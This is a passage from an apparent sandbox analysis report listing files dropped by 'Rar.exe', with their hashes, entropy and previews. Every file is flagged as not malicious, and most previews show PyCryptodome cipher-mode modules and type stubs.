                                                                                                                                                                                                                                  SHA-512:1B34C797E8ADA4085FD4F2B7169221EA70036D631329E6389611351F60FBCCAE0F1CBAE98CC232054615042DA101BFB7BDF4CB98807BDB0469886AC89C9293E5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.?.go..v...ao..(...`o..co..Bo..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.S.bo..Y..bo..Richco..................PE..L...9..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..X...p1...............................0..@............0..t............................text............................... ..`.rdata..&....0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..X....`.......(..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11181
                                                                                                                                                                                                                                  Entropy (8bit):4.6088680499881525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IY/5xlJT9O++U4/2+2U4+B0Xgvz:0rskrs9VqLzJJGTe+2T+Bp
                                                                                                                                                                                                                                  MD5:5391E17052FA07E0183AAA6C3AB6D344
                                                                                                                                                                                                                                  SHA1:31D25884252B3BFB909E20935C8447645E4C233A
                                                                                                                                                                                                                                  SHA-256:4707CD383304E7B5A84330F45EB3E49C72E905072E825859B54D033C87A0AFE7
                                                                                                                                                                                                                                  SHA-512:C134A89F9E6A02942AEA745A6F1232091841EB141874C8645448451B2857FEC4D3384B46FD054643673F083A8FF2D9B204CBA87F53FDD5CEA179AB619F36F8C6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):712
                                                                                                                                                                                                                                  Entropy (8bit):4.750220080456401
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                                                                                                                  MD5:30DD017C0985A1EFF693D631609C1DB6
                                                                                                                                                                                                                                  SHA1:378924C68A2872C951B6AB0291014CD3DD3C3B9C
                                                                                                                                                                                                                                  SHA-256:BCD20F1E0C545F56F186640614FEB8B125A2627F7A56F36DA2A3B2040EFE6FFC
                                                                                                                                                                                                                                  SHA-512:8029C5F0C2789E73A777C9F7609170DE099DDAF80CFDFDC912D2A48740661A5F831B729D7A2CCCC8A4A32CC22CE22480D4871615F49BCE958DB154B9120D4A3C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25025
                                                                                                                                                                                                                                  Entropy (8bit):4.677063276164775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/I+9n1nXrBamtA6/c1VaO37n2x4Cg4wCy4g3NeVRWPv8GxvBsm:0rskrs9Vqb1n71/wH2x4swgg9eXWHVv5
                                                                                                                                                                                                                                  MD5:3E9660F26D207EF9A4C5A4CE2B3772AE
                                                                                                                                                                                                                                  SHA1:CBF049D0BDDB1592528978F77BA3AB75D2AC6227
                                                                                                                                                                                                                                  SHA-256:C65239369F4CF282246AC590FB630A4A83F9340BB41578DF6E419334F70642B5
                                                                                                                                                                                                                                  SHA-512:B8C5726C48B001E5B04FB512121466A27C4D35D90F5C2A890311BAF1B1E1B079C24BDE8CDAFB07090017BE1CC5B464F46E8C7074547CE2BC20BAA97FFA94894E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1647
                                                                                                                                                                                                                                  Entropy (8bit):4.397477650476907
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                                                                                                                  MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                                                                                                                  SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                                                                                                                  SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                                                                                                                  SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11014
                                                                                                                                                                                                                                  Entropy (8bit):4.5201226161912444
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dSMFQHvo5H4dIL3EwOOscx2JL5qwG47W9ytU4p2EVQ57T1qytU4eputAVQqWFCb0:dSCQHvAyOH2JLcOq+U46kYU4o7KCDmJ
                                                                                                                                                                                                                                  MD5:B28169CB2CE510E4A7D3D55FDB214DDE
                                                                                                                                                                                                                                  SHA1:9137A29D0D79352EBDFC04AE641F99263DF5B850
                                                                                                                                                                                                                                  SHA-256:813D8A9659151C4834B488257C205DBAD70BFEE9E45ED6C18CFB9B9010BF23DA
                                                                                                                                                                                                                                  SHA-512:2731A03C91ECA96F06E7A97DD8207B674688A4C6BD7338C124CB61FF63DE231C33237F2073592C6E4216A947419E5F1A69E8D65B1821189880B793DBC8ED283B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_cfb.py : CFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):753
                                                                                                                                                                                                                                  Entropy (8bit):4.690976940000698
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REP+LjT3lGNAYsEHnRNne3yFnR3Fne1
                                                                                                                                                                                                                                  MD5:652CF8ED15152064BFF8807277058B5A
                                                                                                                                                                                                                                  SHA1:D868B6EBCDF4B5AE76DD495FBD506879BCE96B88
                                                                                                                                                                                                                                  SHA-256:FA48D3431DA67394394BCFC79AFA506311A5579E9234299215B06514EC72EDEA
                                                                                                                                                                                                                                  SHA-512:2354A738EBA79324311746672CFB436ECB558212FCFC044030A1C932F0E6EC74E539A38994A1BB7F69D5B84EB2C2F49EDAE11243A8D4B11B6B304425FBE8334F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16205
                                                                                                                                                                                                                                  Entropy (8bit):4.422045978034575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:d5QHvltxqH2LakMiITNEriO+gU46o2U4ozC1ShJnwBil3iYPlIidiSSZD:DeLF7AYT6o2TozWShkaSCl6
                                                                                                                                                                                                                                  MD5:67B5D4EFCCC2EBFD2EF0F2A0D43A0D36
                                                                                                                                                                                                                                  SHA1:613EB622D976517FFB544792C4331093E28237C4
                                                                                                                                                                                                                                  SHA-256:2CB2F14BD56381E0DB323B2E585A3803A667C37F9A852D407AB2B62E09EFBC68
                                                                                                                                                                                                                                  SHA-512:46C59C7ADD4B04DAE6BD85190CD1885347986F6DE4E151543D97DD2E52EFAE0817CB43C96E145CB0491BF45BDAF33BE4619D5C66FDF6015BA5F9A20905E9C5E5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ctr.py : CTR mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):827
                                                                                                                                                                                                                                  Entropy (8bit):4.593860739765962
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1REP+LjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:Y+rLcZVjTvesLeM
                                                                                                                                                                                                                                  MD5:8A35D43812049862067E29C878476C74
                                                                                                                                                                                                                                  SHA1:A12D8A91A7657976F857C769188B625FA27F0697
                                                                                                                                                                                                                                  SHA-256:D5EAD8152A6D1DA357A8B3B4D79E468B3A1201CB4406E83951F7B32F48A2FD1D
                                                                                                                                                                                                                                  SHA-512:18F5C59C21EFB6867FE1B837E0ECC55524B2382F0C95A493CEE012DB691C1B0D6D3BED81D46CDBEE48A9D4C11CE47726F38A98E398557141E90B794B61D25017
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14861
                                                                                                                                                                                                                                  Entropy (8bit):4.674561793295729
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IqCwPVpgaMYO4SU4sU4pzzRWPvguXnYPR:0rskrs9Vq6wk4STsTpz1WHgi6
                                                                                                                                                                                                                                  MD5:DE4BA47AE12810A28473AE92C6C1B6A3
                                                                                                                                                                                                                                  SHA1:52749E06D5B7D25BE027F4C0BB46FED0AF52F890
                                                                                                                                                                                                                                  SHA-256:8643C44AB29F164FBC9F76686CE8D8203A8F9E685ACFD0F8FC22AF9643782E83
                                                                                                                                                                                                                                  SHA-512:9B981CE7693F99FC926C884EDEC2659DDD7B507E49F33A24B6B732D25F0B2543BE29158FE6FBFB73CEA1025324CC6EDDB2E23678981CCAFE75BBE09CFBA7B9D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1590
                                                                                                                                                                                                                                  Entropy (8bit):4.436811038410909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                                                                                                                  MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                                                                                                                  SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                                                                                                                  SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                                                                                                                  SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8529
                                                                                                                                                                                                                                  Entropy (8bit):4.499365740356179
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dBFQHvoWieqW8XSXMxJYuwG2m0/EfQb7nk+qIbpktAV7+qWKWIRI:dfQHvPz8XjJYuwVkZi7Z1WIRI
                                                                                                                                                                                                                                  MD5:BA708C28472BF8A266985DCA4CCD93B1
                                                                                                                                                                                                                                  SHA1:C4E6D55A46EDEB5FDDF8A8BF15A1BA198C94815B
                                                                                                                                                                                                                                  SHA-256:BEB1D881C681295AE01316E857A5AB8D289A4A1B30DCF97ED405FEA5C694892A
                                                                                                                                                                                                                                  SHA-512:D0543D25A7AA3787CF681EBEEDEE2D9229DCB03B8D53125F7AFB40B48040E4B3F4CC912A02C86EEE1E4E2ECAD24669B89174FECC4C199BB94733B159650570A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ecb.py : ECB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):611
                                                                                                                                                                                                                                  Entropy (8bit):4.857553785112337
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                                                                                                                  MD5:12949DC06561F6F7C431BFB79A4F5D05
                                                                                                                                                                                                                                  SHA1:68C7903BA776DC6B8C9B2F3EDA82A9033C001FCC
                                                                                                                                                                                                                                  SHA-256:652C427E0BBCA4838334715C3BF18979F96EB0B3FCFBA8D67992A9D8F7A3CA4D
                                                                                                                                                                                                                                  SHA-512:5B2F563099AFD298366B739064E648ADFA3B42C0A9906A95D48F6AE8B48EBD0EBA01FB864FFB2F5F0BE81493DBE0DBD4DB0EECB6300B35C53FBEBBA92B27E2A5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21917
                                                                                                                                                                                                                                  Entropy (8bit):4.7218595521732905
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0rskrs9Vqjd6xv931hir4YTTTrTXWMXDR/:0r6q0j3qr5WI/
                                                                                                                                                                                                                                  MD5:EE69CE26FAD75A0F241475DBA3E1697C
                                                                                                                                                                                                                                  SHA1:23E08C68DFE560AC0124221A41D323D0410BEEEC
                                                                                                                                                                                                                                  SHA-256:113176FE53453C3E932E18ABFEECF654A0F87E19995DA8D84BEB0E1A85BC3027
                                                                                                                                                                                                                                  SHA-512:087A7577A3EEC8F1F1E058B23794F4DCFB66F4337827073F3B1563107B88637977448DF594388F77469E2072D75E48901CD0D497F276168BB9CEB173750321F2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1586
                                                                                                                                                                                                                                  Entropy (8bit):4.431900531457141
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                                                                                                                  MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                                                                                                                  SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                                                                                                                  SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                                                                                                                  SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20467
                                                                                                                                                                                                                                  Entropy (8bit):4.484216973410615
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IRqz86WmyyJHDrlKXhf5dOvbY40S/SHfp+afbRewJse9q/bqO5f4:0rskrs9VqQqIVhhd6Y4OLe8seyZ5fhD2
                                                                                                                                                                                                                                  MD5:EC64CBF9BFF2B388C5D116CAFA222813
                                                                                                                                                                                                                                  SHA1:0EBA256BF6195A5A15DF1FE9F17AF6BF28689037
                                                                                                                                                                                                                                  SHA-256:3B85F66B106E11ABFF974D8C0505286D895F7A586770ED65317335CD0EEF2FD7
                                                                                                                                                                                                                                  SHA-512:69D0E34D535BA0C98276B862265B827F6F2C7EC5A52A77878BEBFD3F0C81E9D366DFBDA3D8BF4A28F9D672491C343CE7E40DB51E9940DF175C745B48DB89AD52
                                                                                                                                                                                                                                  Malicious:false
